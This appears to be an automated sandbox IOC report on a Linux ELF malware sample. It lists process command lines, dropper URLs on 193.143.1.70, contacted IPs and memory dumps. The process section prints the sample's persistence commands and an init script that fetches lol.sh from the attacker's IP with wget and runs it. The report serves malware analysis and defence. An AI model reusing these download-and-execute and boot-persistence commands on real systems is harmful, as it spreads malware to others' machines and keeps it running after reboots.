Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/x86_64.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/x86_64.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mybinary

/tmp/x86_64.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary

/tmp/x86_64.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

/tmp/x86_64.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/sh

/tmp/x86_64.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/x86_64.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/sh /etc/rc.d/S99sh

/tmp/x86_64.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 38 hidden processes, click here to show them.

URLs

Name

Malicious

http://193.143.1.70/curl.sh

unknown

Details

Name:	http://193.143.1.70/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_64.nn.elf
Source:	x86_64.nn.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/lol.sh

unknown

Details

Name:	http://193.143.1.70/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/x86_64.nn.elf
Source:	x86_64.nn.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/

unknown

Details

Name:	http://193.143.1.70/
TargetID:	-1
From Memory:	true
Source:	x86_64.nn.elf, profile.12.dr, sh.36.dr, inittab.12.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

Domains

Name

Malicious

daisy.ubuntu.com

162.213.35.25

IPs

Domain

Country

Malicious

193.227.110.242

unknown

Romania

157.32.129.181

unknown

India

111.41.167.231

unknown

China

207.95.195.57

unknown

United States

101.238.105.231

unknown

China

112.180.14.218

unknown

Korea Republic of

144.124.52.126

unknown

United Kingdom

140.192.244.215

unknown

United States

23.181.194.87

unknown

Reserved

126.35.157.140

unknown

Japan

195.168.15.172

unknown

Slovakia (SLOVAK Republic)

160.160.178.221

unknown

Morocco

142.206.167.154

unknown

Canada

18.154.178.112

unknown

United States

220.175.194.122

unknown

China

106.224.168.227

unknown

China

9.228.216.215

unknown

United States

43.44.30.245

unknown

Japan

21.89.71.229

unknown

United States

122.65.66.20

unknown

China

200.129.100.153

unknown

Brazil

34.77.167.149

unknown

United States

196.73.235.77

unknown

Morocco

207.133.8.149

unknown

United States

211.125.173.56

unknown

Japan

113.208.24.169

unknown

Japan

115.87.214.18

unknown

Thailand

32.213.194.163

unknown

United States

5.212.21.2

unknown

Iran (ISLAMIC Republic Of)

170.8.136.105

unknown

United States

62.168.73.79

unknown

Slovakia (SLOVAK Republic)

148.40.143.38

unknown

United States

209.219.186.14

unknown

United States

47.196.146.5

unknown

United States

53.174.62.99

unknown

Germany

206.199.125.231

unknown

United States

53.168.156.34

unknown

Germany

62.182.97.138

unknown

United Kingdom

188.110.194.89

unknown

Germany

43.23.107.30

unknown

Japan

161.246.57.87

unknown

Thailand

113.12.16.140

unknown

China

33.61.40.224

unknown

United States

45.25.126.66

unknown

United States

124.162.131.93

unknown

China

82.119.1.128

unknown

Germany

39.12.185.110

unknown

Taiwan; Republic of China (ROC)

200.255.110.114

unknown

Brazil

193.183.101.104

unknown

Sweden

31.223.66.192

unknown

Turkey

26.190.200.25

unknown

United States

171.78.2.253

unknown

India

64.190.99.77

unknown

United States

89.159.252.107

unknown

France

122.11.9.236

unknown

China

50.248.63.81

unknown

United States

158.162.18.57

unknown

Portugal

193.143.1.59

unknown

136.104.140.83

unknown

United States

218.115.253.199

unknown

Japan

116.161.90.59

unknown

China

81.133.134.137

unknown

United Kingdom

186.119.165.197

unknown

Colombia

194.218.41.180

unknown

Sweden

219.156.139.54

unknown

China

81.194.110.235

unknown

France

63.142.25.40

unknown

United States

48.11.243.211

unknown

United States

194.156.30.70

unknown

Germany

6.55.252.178

unknown

United States

166.152.63.188

unknown

United States

34.125.29.91

unknown

United States

212.237.156.247

unknown

Luxembourg

157.25.111.135

unknown

Poland

67.159.164.129

unknown

United States

124.91.251.148

unknown

China

196.66.210.114

unknown

Morocco

210.35.19.92

unknown

China

121.220.99.34

unknown

Australia

221.108.70.88

unknown

Japan

54.91.75.127

unknown

United States

54.197.178.60

unknown

United States

155.12.27.148

unknown

Tanzania United Republic of

173.154.47.54

unknown

United States

186.103.183.135

unknown

Chile

118.122.129.208

unknown

China

126.215.214.117

unknown

Japan

166.40.118.64

unknown

United States

1.144.92.233

unknown

Australia

45.131.50.184

unknown

Russian Federation

152.92.88.216

unknown

Brazil

101.164.54.116

unknown

Australia

43.178.1.114

unknown

Japan

180.18.192.18

unknown

Japan

190.163.96.136

unknown

Chile

188.21.228.239

unknown

Austria

75.146.14.227

unknown

United States

217.78.182.197

unknown

Russian Federation

162.73.34.26

unknown

Canada

148.135.210.242

unknown

Sweden

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

418000

page execute read

418000

page execute read

51b000

page read and write

518000

page read and write

518000

page read and write

7ffcc2eb5000

page read and write

7ffcc2f31000

page execute read

7ffcc2eb5000

page read and write

15dd000

page read and write

7ffcc2f31000

page execute read

15e3000

page read and write

15dd000

page read and write

51b000

page read and write

There are 3 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
x86_64.nn.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportx86_64.nn.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
x86_64.nn.elf